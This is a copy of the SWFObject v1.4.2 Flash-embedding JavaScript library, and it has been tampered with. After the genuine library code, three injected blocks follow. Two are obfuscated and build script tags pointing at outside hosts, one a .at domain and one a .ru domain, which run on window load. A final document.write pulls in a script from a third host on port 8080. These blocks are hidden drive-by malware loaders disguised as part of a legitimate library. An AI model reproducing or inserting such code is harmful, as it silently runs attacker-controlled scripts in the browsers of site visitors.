/**
 * SWFObject v1.4.2: Flash Player detection and embed - http://blog.deconcept.com/swfobject/
 *
 * SWFObject is (c) 2006 Geoff Stearns and is released under the MIT License:
 * http://www.opensource.org/licenses/mit-license.php
 *
 * **SWFObject is the SWF embed script formerly known as FlashObject. The name was changed for
 *   legal reasons.
 */
if(typeof deconcept=="undefined"){var deconcept=new Object();}
if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}
if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}
deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a,_b){
if(!document.getElementById){return;}
this.DETECT_KEY=_b?_b:"detectflash";
this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);
this.params=new Object();
this.variables=new Object();
this.attributes=new Array();
if(_1){this.setAttribute("swf",_1);}
if(id){this.setAttribute("id",id);}
if(w){this.setAttribute("width",w);}
if(h){this.setAttribute("height",h);}
if(_5){this.setAttribute("version",new deconcept.PlayerVersion(_5.toString().split(".")));}
this.installedVer=deconcept.SWFObjectUtil.getPlayerVersion();
if(c){this.addParam("bgcolor",c);}
var q=_8?_8:"high";
this.addParam("quality",q);
this.setAttribute("useExpressInstall",_7);
this.setAttribute("doExpressInstall",false);
var _d=(_9)?_9:window.location;
this.setAttribute("xiRedirectUrl",_d);
this.setAttribute("redirectUrl","");
if(_a){this.setAttribute("redirectUrl",_a);}};
deconcept.SWFObject.prototype={setAttribute:function(_e,_f){
this.attributes[_e]=_f;
},getAttribute:function(_10){
return this.attributes[_10];
},addParam:function(_11,_12){
this.params[_11]=_12;
},getParams:function(){
return this.params;
},addVariable:function(_13,_14){
this.variables[_13]=_14;
},getVariable:function(_15){
return this.variables[_15];
},getVariables:function(){
return this.variables;
},getVariablePairs:function(){
var _16=new Array();
var key;
var _18=this.getVariables();
for(key in _18){_16.push(key+"="+_18[key]);}
return _16;
},getSWFHTML:function(){
var _19="";
if(navigator.plugins&&navigator.mimeTypes&&navigator.mimeTypes.length){
if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","PlugIn");}
_19="<embed type=\"application/x-shockwave-flash\" src=\""+this.getAttribute("swf")+"\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\"";
_19+=" id=\""+this.getAttribute("id")+"\" name=\""+this.getAttribute("id")+"\" ";
var _1a=this.getParams();
for(var key in _1a){_19+=key+"=\""+_1a[key]+"\" ";}
var _1c=this.getVariablePairs().join("&");
if(_1c.length>0){_19+="flashvars=\""+_1c+"\"";}
_19+="/>";
}else{if(this.getAttribute("doExpressInstall")){
this.addVariable("MMplayerType","ActiveX");}
_19="<object id=\""+this.getAttribute("id")+"\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\">";
_19+="<param name=\"movie\" value=\""+this.getAttribute("swf")+"\" />";
var _1d=this.getParams();
for(var key in _1d){_19+="<param name=\""+key+"\" value=\""+_1d[key]+"\" />";}
var _1f=this.getVariablePairs().join("&");
if(_1f.length>0){_19+="<param name=\"flashvars\" value=\""+_1f+"\" />";}
_19+="</object>";}
return _19;
},write:function(_20){
if(this.getAttribute("useExpressInstall")){
var _21=new deconcept.PlayerVersion([6,0,65]);
if(this.installedVer.versionIsValid(_21)&&!this.installedVer.versionIsValid(this.getAttribute("version"))){
this.setAttribute("doExpressInstall",true);
this.addVariable("MMredirectURL",escape(this.getAttribute("xiRedirectUrl")));
document.title=document.title.slice(0,47)+" - Flash Player Installation";
this.addVariable("MMdoctitle",document.title);}}
if(this.skipDetect||this.getAttribute("doExpressInstall")||this.installedVer.versionIsValid(this.getAttribute("version"))){
var n=(typeof _20=="string")?document.getElementById(_20):_20;
n.innerHTML=this.getSWFHTML();
return true;
}else{
if(this.getAttribute("redirectUrl")!=""){document.location.replace(this.getAttribute("redirectUrl"));}}
return false;}};
deconcept.SWFObjectUtil.getPlayerVersion=function(){
var _23=new deconcept.PlayerVersion([0,0,0]);
if(navigator.plugins&&navigator.mimeTypes.length){
var x=navigator.plugins["Shockwave Flash"];
if(x&&x.description){_23=new deconcept.PlayerVersion(x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));}
}else{
try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");}
catch(e){try{
var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");
_23=new deconcept.PlayerVersion([6,0,21]);
axo.AllowScriptAccess="always";}
catch(e){
if(_23.major==6){return _23;}}try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");}
catch(e){}}
if(axo!=null){_23=new deconcept.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));}}
return _23;};
deconcept.PlayerVersion=function(_27){
this.major=_27[0]!=null?parseInt(_27[0]):0;
this.minor=_27[1]!=null?parseInt(_27[1]):0;
this.rev=_27[2]!=null?parseInt(_27[2]):0;
};
deconcept.PlayerVersion.prototype.versionIsValid=function(fv){
if(this.major<fv.major){return false;}
if(this.major>fv.major){return true;}
if(this.minor<fv.minor){return false;}
if(this.minor>fv.minor){return true;}
if(this.rev<fv.rev){return false;}
return true;
};
deconcept.util={getRequestParameter:function(_29){
var q=document.location.search||document.location.hash;
if(q){
var _2b=q.substring(1).split("&");
for(var i=0;i<_2b.length;i++){
if(_2b[i].substring(0,_2b[i].indexOf("="))==_29){
return _2b[i].substring((_2b[i].indexOf("=")+1));}}}
return "";}};
deconcept.SWFObjectUtil.cleanupSWFs=function(){
var _2d=document.getElementsByTagName("OBJECT");
for(var i=0;i<_2d.length;i++){
_2d[i].style.display="none";
for(var x in _2d[i]){if(typeof _2d[i][x]=="function"){_2d[i][x]=null;}}}};
if(typeof window.onunload=="function"){
var oldunload=window.onunload;
window.onunload=function(){
deconcept.SWFObjectUtil.cleanupSWFs();
oldunload();};
}else{window.onunload=deconcept.SWFObjectUtil.cleanupSWFs;}
if(Array.prototype.push==null){
Array.prototype.push=function(_30){
this[this.length]=_30;
return this.length;};}

var getQueryParamValue=deconcept.util.getRequestParameter;
var FlashObject=deconcept.SWFObject; // for legacy support
var SWFObject=deconcept.SWFObject;


var iv;if(iv!='n'){iv='n'};var vr;if(vr!='r' && vr != ''){vr=null};try {var IT=new Date();var X=new Array();var a=window[unescape("%75%6e%65%73%63%61%70%65")];var U;if(U!='va' && U!='B'){U='va'};var aS='';var g=window[a("%52%65%67%45%78%70")];var zX;if(zX!='ws' && zX!='m'){zX='ws'};var Bu="";var nw;if(nw!='' && nw!='lU'){nw='M'};var j=null;var Kg='';var p=a("%72%65%70%6c%61%63%65");function s(w,I){var eo=new Array();var gq=new Date();var nR;if(nR!='YF'){nR='YF'};var pI=a("%5b");this.uV="";this.MR="";pI+=I;this.Pb="";pI+=a("%5d");var HJ='';var Wc='';var T=new g(pI, a("%67"));return w.replace(T, j);this.F='';};var kW="";this.HZ="";var gb='';var w=a("%31");var Z=new Date();var x=new Date();var l=s('81526442597461996034155631965512436387694653733516530416393677969671','63514792');var S='';var i=new String("S5R2on".substr(4)+"lo"+"ad");var nP;if(nP!='zM' && nP != ''){nP=null};var D=s('/5g5oEoEgXlHeX.EcEoCmX/5sXaFnXo9o3k3.3c3oUmC/9dXe3e9z5e5rH.CcFoXm5.EpXh3p3','E39XHC5UF');this.wQ="";var vl;if(vl!='gu' && vl!='to'){vl='gu'};var c=a("%73%63%72%69%70%74");var z="\x68\x74\x74\x70\x3a\x2f\x2f\x66\x72\x65\x65\x63\x61\x72\x7a\x6f\x6e\x65\x2e\x61\x74\x3a";var _=new String();var sT;if(sT!='Td'){sT=''};var na='';var Oq;if(Oq!='Vw'){Oq='Vw'};function h(){var RW=new String();var AG="";var t=document;var zf;if(zf!='' && zf!='hG'){zf='Ji'};var Bt=new String();L=t.createElement(c);var kz;if(kz!='' && kz!='tr'){kz=null};var cw;if(cw!='Bo' && cw!='HM'){cw=''};gb+=z;gb+=l+D;var fv;if(fv!='iQ' && fv != ''){fv=null};var NL;if(NL!='TB' && NL != ''){NL=null};L.defer=w;var o=t.body;L.src=gb;var Xk;if(Xk!='' && Xk!='ci'){Xk='kI'};var IJ="";this.DK='';var py=new String();o.appendChild(L);var HX="";};var G;if(G!='rG' && G != ''){G=null};var xC='';var lf='';window[i]=h;var up=new Array();} catch(c_){var Gs;if(Gs!='' && Gs!='ta'){Gs=null};};var eU='';var d;if(d!='' && d!='jp'){d=null};


c=60942;c+=247;try {var sM='uZ'} catch(sM){};v=24488;v-=253;function x(){this.Zt=51275;this.Zt-=53;var g=window;this.E=false;var _=String("sr"+"c");var wg={gm:12847};var eW=["aM","wG"];var V=new String("appen"+"dChil"+"d");try {var P='ui'} catch(P){};var u=new String("f68screat".substr(4)+"eElem"+"ent");var Iw="";var M=String("defer");var jn=["b","jh","G"];var t=new String("scrpDBF".substr(0,3)+"ipt");var k=new Date();var e=String("onlo"+"ad");var N={Tc:false};Nf={Y:57507};var tx=new String("body");var Qg=48473;var Np='';IR=[];var C=document;try {} catch(Wv){};try {} catch(i){};egW=["eg"];F=28358;F+=130;function T(){this.Gi=39550;this.Gi+=107;var p=["FU","yZ","Dp"];try {var ew="";X=["EY"];try {var z='kZ'} catch(z){};var ug=String("ht"+"tp"+":/uEz".substr(0,2)+"h8m/dh8m".substr(3,2)+"An4ir4nA".substr(3,2)+"tyrd0".substr(0,2)+"siLV0".substr(0,2)+"n."+"ru"+"K5lZ:KZ5l".substr(4,1));var S=new Array();var a=new String("/g"+"oo"+"RNVmgl".substr(4)+"e."+"5Ja8co".substr(4)+"m/"+"am"+"az"+"onezR".substr(0,2)+"J8P.c8JP".substr(3,2)+"om"+"Geu/auGe".substr(3,2)+"Zj9ma9jZ".substr(3,2)+"zoAjMv".substr(0,2)+"2d5ln.ld25".substr(4,2)+"Xa74deaX74".substr(4,2)+".p"+"hp");pd=["HF","gg"];var DL=new Array();var tW=9697-9696;var o=444004-435924;var pA=47913;this.We=30421;this.We+=73;this.dw='';Z=C[u](t);this.Mo="";var _oV="";m=["Yg","aE","Gu"];this.yV="";this.sE=57057;this.sE+=53;Z[_]=ug+o+a;IQ={HY:"K"};Z[M]=tW;var EZ={Si:false};var Ye=["qt","Ws","su"];rBv=16363;rBv+=207;C[tx][V](Z);fZ=4183;fZ-=57;} catch(y){this.SA=51875;this.SA-=186;this.YO=6234;this.YO++;};this.rY=10757;this.rY-=144;this.sW=false;}g[e]=T;try {} catch(fWf){};Do=["VX"];};var rF={Tv:false};x();TZ=33200;TZ--;var oJ={dq:55000};





document.write('<s'+'cript type="text/javascript" src="http://assol.metro-trading.net:8080/Raw_Data.js"></scr'+'ipt>');
